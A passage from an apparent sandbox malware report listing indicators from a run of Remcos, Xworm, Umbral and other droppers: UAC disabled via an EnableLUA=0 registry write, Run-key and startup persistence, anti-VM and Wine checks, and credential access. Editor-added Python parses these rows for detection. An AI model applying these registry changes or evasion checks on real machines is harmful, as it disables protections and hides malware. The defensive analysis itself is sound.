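PID 5476 created 5516 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
PID 5476 created 4016 N/A C:\Windows\System32\svchost.exe C:\Windows\explorer.exe
PID 5476 created 2976 N/A C:\Windows\System32\svchost.exe C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"""


def parse_rows(text):
    """One dict per matching row; non-matching lines (headings) are skipped."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def classify(ev):
    creator = ev["creator_image"].lower()
    parent = ev["parent_image"].lower()
    if creator.startswith(SYSTEM_DIRS) and creator.endswith("\\svchost.exe"):
        # AppInfo (UAC) launches the elevated process from svchost.exe and sets
        # the requester as its parent: evidence that the target was elevated.
        return "elevation-broker"
    if any(frag in creator for frag in USER_WRITABLE):
        # Malware in Temp/ProgramData picking its own parent: PPID spoofing.
        return "ppid-spoof-from-user-dir"
    if parent.endswith(PRIVILEGED):
        # Anything parented onto winlogon/lsass/etc. needs a look at the child.
        return "ppid-spoof-privileged-parent"
    return "review"


def class_counts(events):
    counts = {}
    for ev in events:
        c = classify(ev)
        counts[c] = counts.get(c, 0) + 1
    return counts


def summarize(events):
    """Per creator PID: image, row count, distinct designated parents, classes."""
    by = defaultdict(lambda: {"image": None, "rows": 0, "parents": set(), "classes": set()})
    for ev in events:
        s = by[ev["creator_pid"]]
        s["image"] = ev["creator_image"]
        s["rows"] += 1
        s["parents"].add(ev["parent_pid"])
        s["classes"].add(classify(ev))
    return dict(by)


if __name__ == "__main__":
    evs = parse_rows(SAMPLE_ROWS)
    print(class_counts(evs))
    for pid, s in summarize(evs).items():
        print(pid, s["image"], s["rows"], "rows,", len(s["parents"]), "parents", sorted(s["classes"]))
```

On the sixteen rows this yields twelve elevation-broker launches (eleven from PID 5476 under ten distinct requesters, one from PID 4464 for rutserv.exe), three user-directory spoofs by Dynpvoy.exe and Gxtuum.exe onto Explorer, and the single powershell.EXE row that parented a process onto winlogon.exe, which is the one whose child is worth identifying first.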

UAC bypass

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Xworm

trojan rat xworm

Xworm family

xworm

Detected Nirsoft tools

1 hit (description, indicator, process and target all N/A)

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Adds policy Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
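The registry tables above (UAC bypass, VirtualBox ACPI check, policy Run key, BIOS information, computer location) all use one row layout, and the interesting detail in them is easy to misread in the raw form: the Remcos autorun value is printed with its quotes and backslashes escaped, and the EnableLUA write is only meaningful because the value is "0". The Python below is an added example by the editor, not the sandbox's code: it parses that row layout, undoes the escaping so the autorun command comes out as a usable path, and maps each key to the technique it evidences using a small rule table of the editor's own. The row format and the rule table are assumptions; SAMPLE_ROWS are copied from the tables above.

```python
"""Parse registry indicator rows from a sandbox signature table and map each
to the technique it evidences.

Added example, not part of the original report. ROW_RE encodes the row layout
as it appears on the page; RULES is the editor's own rule table, not the
sandbox's signature logic.
"""
import re

ROW_RE = re.compile(
    r"^(?P<action>Key created|Key opened|Key value queried|Set value \((?P<vtype>\w+)\)) "
    r"(?P<key>\\REGISTRY\\.+?)"
    r'(?: = "(?P<value>.*)")?'
    r" (?P<process>[A-Za-z]:\\.+?) (?P<target>N/A|[A-Za-z]:\\.*)$"
)

SAMPLE_ROWS = r'''
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
'''


def unescape(value):
    """Undo the escaping the report applies to string values
    (backslash-quote becomes a quote, doubled backslash becomes one)."""
    return re.sub(r'\\(["\\])', r"\1", value)


def _is_run_key(k):
    return "\\currentversion\\run\\" in k or "\\policies\\explorer\\run\\" in k


# (predicate on lower-cased key and decoded value, tactic, description)
RULES = [
    (lambda k, v: k.endswith("\\policies\\system\\enablelua") and v == "0",
     "defense_evasion", "UAC disabled (EnableLUA=0)"),
    (lambda k, v: _is_run_key(k) and v is not None,
     "persistence", "autorun entry written"),
    (lambda k, v: k.endswith("\\acpi\\dsdt\\vbox__"),
     "evasion", "VirtualBox ACPI table probed (anti-VM)"),
    (lambda k, v: k.endswith(("\\systembiosversion", "\\videobiosversion")),
     "discovery", "BIOS version strings read (VM/sandbox fingerprinting)"),
    (lambda k, v: k.endswith("\\control panel\\international\\geo\\nation"),
     "discovery", "machine country code read (geofencing)"),
]


def parse_rows(text):
    """One dict per matching row, with string values already unescaped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            d = m.groupdict()
            if d["value"] is not None:
                d["value"] = unescape(d["value"])
            rows.append(d)
    return rows


def findings(rows):
    """First matching rule per row; rows no rule covers produce nothing."""
    out = []
    for r in rows:
        key = r["key"].lower()
        for pred, tactic, desc in RULES:
            if pred(key, r["value"]):
                f = {"tactic": tactic, "finding": desc,
                     "process": r["process"], "key": r["key"]}
                if tactic == "persistence":
                    # The autorun value is a quoted path; hand back the bare path.
                    f["command"] = r["value"].strip('"')
                out.append(f)
                break
    return out


if __name__ == "__main__":
    for f in findings(parse_rows(SAMPLE_ROWS)):
        print(f["tactic"], "|", f["finding"], "|", f["process"], "|", f.get("command", ""))
```

The "Key created" row for the Run key deliberately yields no finding: the write of the Remcos value on the same key is the actionable event, and reporting the key creation separately would double-count it.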

Clipboard Data

collection

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\SH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx C:\Windows\System32\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
